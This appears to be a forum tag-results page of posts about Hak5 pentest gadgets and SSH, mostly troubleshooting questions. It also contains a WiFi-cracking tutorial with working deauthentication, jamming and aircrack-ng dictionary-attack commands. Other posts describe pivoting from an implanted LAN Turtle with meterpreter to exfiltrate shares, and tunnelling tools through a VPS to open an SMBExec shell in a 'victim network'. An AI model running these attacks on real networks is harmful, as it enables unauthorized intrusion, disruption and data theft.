Showing results for tags 'ssh'.

Found 11 results

  1. Welcome to part three of my tutorial series. I will be showing you how to crack WiFi.

     Requirements: SSH, WiFi card with monitor mode, Aircrack suite, dictionary, mdk3 (optional).

     So if you've been following along you should now be able to sniff packets from a wireless card in monitor mode. I'll briefly explain what we need to do. We need to start recording just like we did before with airodump. While that is running, we need to also do a deauthentication attack at the same time. Optionally, we may strip the file down to save space. Then we can run a bruteforce attack using the data we just collected.

     First we need to start monitor mode and start capturing as shown in part two:

     ifconfig wlan1 up
     airmon-ng check kill
     airmon-ng start wlanX
     airodump-ng -w MySecondDump wlanXmon

     Now that we have that running in the background, capturing all the network traffic, we need to work on capturing a 4-way handshake. So what's a 4-way handshake anyway? If we can record this entire process using airodump, we will have all the information we need to perform an attack to get the actual password. The easiest way of doing this is simply to let airodump capture and record packets. Eventually someone will come along and connect to the network, then we will have the handshake. So at this point in time you should have airodump running and collecting packets. In order to check if it has captured a 4-way handshake or not, simply run this command:

     aircrack-ng MySecondDump-01.cap

     (It automatically adds an 01 to the end of the name, to prevent two files from having the same name.) Either you didn't wait long enough (nobody connected to the network while it was capturing), or somebody connected to the network and it was successfully recorded. Now I realize that sitting there and waiting on someone to connect to the network might not be the most fun thing to do, or the fastest. So you can GREATLY speed this up, as long as there is already a wireless device on the network.

     The way we do this is by a deauthentication attack. Basically we force their devices to reconnect to the network, so we can capture the handshake when they do. I find the best way to do this is with a tool called mdk3. This is a part of Kali, but it's not built in on the pineapple. To install it on the pineapple, simply run:

     opkg install mdk3

     Now that we have mdk3, we can use it to run this attack. There are two ways to run this attack. One way is by running the attack against anything, basically creating a WiFi jammer. The second (and nicer) way is to target a device and attack it. To do it the first way, you will simply use:

     mdk3 wlanXmon d -c

     mdk3 is the tool, wlanXmon is the WiFi card to use, d tells it to do a deauthentication attack, and -c tells it to run the attack on all channels. If you would like to do it the second way, you need to know the target's MAC address. Once you have this address, save it in a text file named Targets.txt. Then the command would be:

     mdk3 wlanXmon d -b Targets.txt -c

     By either waiting long enough, or by using this trick (or both), you will eventually capture the handshake. Now we can use it to bruteforce the WiFi password. This is where the dictionary comes in. You're going to need a password list. The way this works is that it tests every single password in the list, and if one of them is right, it will tell you. A good place to find them is here. Now that we have both a .cap file containing the 4-way handshake and a dictionary, we can start the attack:

     aircrack-ng MySecondDump.cap -w Dictionary.txt

     It will then ask you which network you would like to attack. Simply type the number to the left, then press enter. Now it will go through every password in the list until either it finds the password, or it goes through every password and it's not on the list.

     A few notes. The first one is that the speed of the crack depends on the capabilities of your computer. Using both my CPU and GPU, my computer takes about 3 hours to test my massive 13GB list, which contains just under one billion passwords. (i7 6700 3.4GHz, Nvidia GTX960, 16GB RAM) If you have a less powerful computer, you'll want to look for smaller, more optimized lists. Things like the most commonly used passwords. Another note is that using the mdk3 tool without a target is extremely disruptive, please don't do it this way. It will kick everyone in range off of whatever WiFi they are on; the only reason I even include it here is so you don't go around doing it unknowingly. Also, aircrack only uses your computer's CPU, so having a good video card will not make it run faster. I will create another tutorial later showing how to use a few alternatives, such as deauthentication without mdk3, and using tshark, cowpatty, and pyrit to verify handshakes instead of aircrack. And also how to capture and strip your .cap files at the same time. It's 3AM on December 25th, so I will be out with family most of the day tomorrow; odds are I won't have a chance to write part four until Saturday.
  2. I want to automate an SSH login. I was looking at sshpass or expect. But I haven't been able to find a working example of either. Anybody use either of these? Also something of note: I don't know the hostname of the remote machine yet. I'm trying to get that in an automated way as well. I've tried traceroute, smbclient, nslookup, host, arp, and finger. Expect needs to expect user@host before it can send any commands over SSH, but I don't know the hostname at this point.
  3. So I received my WiFi Pineapple NANO a few days ago and it worked fine on the first try. I got on to the web interface and reached the point of updating the firmware, and I think I may have messed up. Now whenever I plug the NANO in, the light flashes twice, holds for about 5 seconds, then turns off. I can't ssh to it, I can't get the web interface and I can't see it as a WiFi network. Any advice?
  4. When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET and trying to SSH into the bunny ( with PuTTY as root, I always get 'Access Denied'. I've changed the default password using attackmode serial, but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  5. I am a complete noob at this, so I could be doing something completely wrong. Just got the LAN Turtle today. Plugged it in with a phone charger meeting minimum power requirements and connected it to a PC with an OTG ethernet-to-USB adapter. Had to set up the network connection manually (on Ubuntu 16.10) with: IP -, Netmask -, Gateway -, DNS Servers - and After that, I checked the connection with ifconfig and everything appears to be OK, so I finally tried connecting to the LAN Turtle: $ ssh root@ Permission denied (publickey). I have set up openssh on a few of my PCs for ssh-key authentication only, but this is the first time using the LAN Turtle. Also realised I cannot browse the internet while it is connected, even with WiFi and another wired connection available. I have searched around to see if there is a fix for this, but I cannot find anything.
  6. I have followed Hak5's YouTube instructions in LAN Turtle basics on how to set up autossh. I have a remote server. SSH works if the LAN Turtle is plugged into the device sshing into it. However, autossh does not work unless I type iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT. But if I reboot the LAN Turtle, I cannot ssh into it from my remote server unless I rerun the iptables command. Putting iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT in /etc/firewall.user does not help. Any ideas?
  7. I have just done the first setup of my LAN Turtle following the instructions provided in the YouTube video. I then went to ssh into my LAN Turtle. I am 99% sure the password I typed is correct, but I get Permission denied (publickey, password, keyboard-interactive). I have never seen the keyboard-interactive part before. Can I access my LAN Turtle without removing the screws under the sticker, as this ruins the look? Thank you, luke-spademan
  8. I've been having some trouble with my router lately. I'm trying to get everything set up for autossh. If I'm logged in to my router and try to connect to my device, I get this error: ( is the NANO) However, if I'm on my NANO and try connecting to my router, it works perfectly. So it's like a one-way connection. Both devices have all the proper keys added, so no passwords are needed. My router is using SSH-2.0 Dropbear 2014.63, and the pineapple of course uses SSH-2.0 OpenSSH 6.8. The firmware of the router is DD-WRT v24 sp2 std. P.S. I posted the question here as I don't think it's anything pineapple-specific. Feel free to move it if needed.
  9. Hey guys, I was checking the System Log and I saw the following entries: auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ecdsa_key auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ed25519_key I recently did a fresh factory reset and updated to 1.0.6. SSH into the pineapple is possible, but I wonder why the keys were not generated. Anyone else with this error message?
  10. Hello! After reading about the LAN Turtle and watching the videos for it, I have a few questions about the product before I purchase it. Let's take the example that I have successfully installed the LAN Turtle on a targeted computer. I've got a remote SSH connection to the Turtle and a meterpreter session active. If I've understood correctly, the LAN Turtle is the only equipment on the network I have access to, and not even the computer it is attached to! So if I want to get access to computers on the network, I could use the meterpreter session and launch attacks on the computers from the Turtle and get a new meterpreter into the new computer and work from there? If there is a vulnerable computer on the network, of course. Can the Turtle, which is connected to the network, also visit network folders/disks? Let's say there is a computer/server sharing files and it's accessible by anyone on the network. Can the Turtle access these network folders if they are open for the network the Turtle is connected to, and transfer these files to the SSH server, for example? I'm pretty new to metasploit but still learning how it works and how it would work out with the LAN Turtle in practice. Also a great tool when I perform pentests for the local companies (FYI: legal and paid work, I don't plan to abuse this if someone were to ask). I mostly do physical testing and assessment, and this would be a really good tool for me as my other co-worker does the software/web part.
  11. Hi all! Just wanted to share something that might help other LAN Turtlers out there. One of the things I wanted to do with my LAN Turtle was to pivot my tools from my local box through the Turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your Turtle.

      My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network]

      I ran into trouble trying to figure out how to set up an SSH proxychain to it... found this article which worked right away: I used the first line, which was this command:

      ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c

      Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the Turtle, which should be root@localhost -p 2222. By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a SOCKS proxy through SSH that goes through our VPS in the cloud, and then logs into the Turtle (which already connects back to that VPS, through autossh). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use... for example! I wanted to be able to use Veil-Pillage from my local Kali box to get an SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran:

      root@kali# proxychains ./Veil-Pillage

      Which would take me to the dialogue screen. I chose number 25, set my target (which was, a win7 VM) and my creds, and just hit run!

      Veil-Pillage: post-explotation framework | [Version]: 1.1.2
      =========================================================================
      [Web]: | [Twitter]: @VeilFramework
      =========================================================================
      [*] Executing module: Smbexec Shell...
      [*] Type 'exit' to exit the shell
      Trying protocol 445/SMB...
      Creating service SystemDiag...
      |S-chain|-<>-***.***.***.***-<><>-<><>-OK
      [!] Launching semi-interactive shell - Careful what you execute
      C:\Windows\system32>

      And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, set up the SOCKS4 proxy, and then set up proxychains to reflect your VPS instance. Don't forget to add the route! Let me know your thoughts!

      TL;DR: SSH SOCKS proxy -- root@kali# ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"